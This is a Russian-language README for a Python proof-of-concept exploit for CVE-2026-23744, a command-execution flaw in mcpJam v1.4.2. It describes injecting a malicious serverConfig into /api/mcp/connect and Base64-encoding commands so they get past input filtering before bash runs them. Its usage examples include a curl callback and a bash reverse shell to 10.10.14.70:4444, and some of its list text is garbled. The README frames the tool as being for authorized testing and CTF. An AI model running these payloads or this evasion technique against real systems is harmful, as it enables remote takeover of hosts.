
cve-2026-23744 python эксплойт
Эксплойт на Python 3, подтверждающий концепцию для CVE-2026-23744 — уязвимости произвольного выполнения команд, затрагивающей mcpJam v1.4.2.
Эта утилита автоматизирует доставку полезной нагрузки, прозрачно кодируя команды в Base64 перед передачей, что помогает обойти ограничительные механизмы проверки ввода и фильтрации символов. Полезная нагрузка декодируется и выполняется через обёртку /bin/bash на целевой системе.
Команды автоматически кодируются перед передачей, что повышает надёжность при атаке на приложения, которые налагают строгую проверку ввода или ограничения на символы.
Поддерживает выполнение произвольных команд, включая:
sh, bash, и т.д.)ncОтображает:
Это упрощает поиск неисправностей и проверку эксплойта.
Подавляет предупреждения о проверке сертификатов, позволяя взаимодействовать с целями, использующими самоподписанные или иные ненадёжные SSL-сертификаты.
Установите необходимую зависимость:
pip install requests
python3 exploit.py <target_url> "<command>"
python3 exploit.py http://devhub.com:6274 "curl http://10.10.14.70:8888"
python3 exploit.py http://devhub.com:6274 "sh -i >& /dev/tcp/10.10.14.70/4444 0>&1"
Эксплойт нацелен на конечную точку /api/mcp/connect, создавая вредоносный объект serverConfig.
Вместо прямой передачи команд полезная нагрузка преобразуется в строку, закодированную в Base64, и выполняется через Bash:
"args": [
"-c",
f"echo {base64_payload} | base64 -d | bash"
]
Этот подход помогает обойти фильтрацию на уровне приложения, гарантируя, что полезная нагрузка декодируется и выполняется полностью на целевом хосте.
serverConfig.base64 -d./bin/bash.[!WARNING] Этот проект предоставляется исключительно в образовательных целях, для авторизованных оценок безопасности и сред Capture The Flag (CTF).
Несанкционированное использование против систем, на которые у вас нет явного разрешения, является незаконным и неэтичным. Автор не несёт ответственности за любое неправомерное использование, ущерб или правовые последствия, возникшие в результате использования данного программного обеспечения.